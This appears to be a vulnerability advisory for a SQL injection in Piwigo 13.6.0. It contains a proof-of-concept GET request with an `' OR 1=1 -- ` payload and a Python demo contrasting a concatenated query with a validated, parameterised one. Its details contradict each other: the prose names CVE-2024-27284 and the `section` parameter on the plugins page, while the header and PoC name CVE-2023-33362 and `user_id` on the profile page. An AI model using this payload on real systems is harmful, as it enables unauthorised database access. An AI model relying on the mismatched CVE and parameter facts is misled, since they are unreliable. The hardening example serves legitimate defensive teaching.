Piwigo 13.6.0 was vulnerable to a SQL Injection (CVE-2024-27284).
This flaw allowed authenticated administrators to inject malicious SQL queries. The vulnerability resided in the `section` parameter of `admin.php?page=plugins` when managing extensions.
By manipulating this parameter, an attacker could extract sensitive database information, modify data, or potentially achieve further system compromise. While requiring admin privileges limits unauthenticated exploitation, it poses a significant risk if an admin account is compromised.
Users should upgrade to Piwigo 13.7.0 or newer to patch this issue.
# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0
# Tested on: Windows
# CVE : CVE-2023-33362
Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1
Host: piwigo
Steps to Reproduce:
1. Login as an admin user.
2. Send the request.
3. Observe the result.
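The pattern behind the PoC above, as an added example that is not Piwigo's code: a constructed in-memory SQLite `users` table stands in for the real database, and the page's `user_id` payload is run against a query built by string concatenation and against one that validates the id as an integer and binds it as a parameter.

```python
"""Vulnerable vs. hardened handling of an admin `user_id` parameter.

Constructed example (not Piwigo's code): the table, rows and function
names are assumptions so the advisory's payload can be run offline.
"""
import re
import sqlite3

PAYLOAD = "' OR 1=1 -- "  # the value from the PoC request above
ID_PATTERN = re.compile(r"^\d+$")


def make_db() -> sqlite3.Connection:
    """Build a small constructed users table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, mail TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", "admin@example.invalid"),
        (2, "alice", "alice@example.invalid"),
        (3, "bob", "bob@example.invalid"),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Untrusted input is spliced straight into the SQL text, so the
    quote in the payload closes the literal and `OR 1=1` matches every row;
    the trailing `--` comments out the rest of the statement."""
    sql = f"SELECT id, username, mail FROM users WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, user_id: str) -> list:
    """Reject anything that is not a plain integer before it reaches SQL,
    then bind the value as a parameter so it cannot change the query."""
    if not ID_PATTERN.fullmatch(user_id):
        raise ValueError("user_id must be a positive integer")
    return conn.execute(
        "SELECT id, username, mail FROM users WHERE id = ?", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", len(lookup_vulnerable(db, PAYLOAD)), "rows returned")
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened:", exc)
```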
Piwigo 13.6.0 SQL Injection
- Written by: khalil shreateh
- Category: Vulnerabilities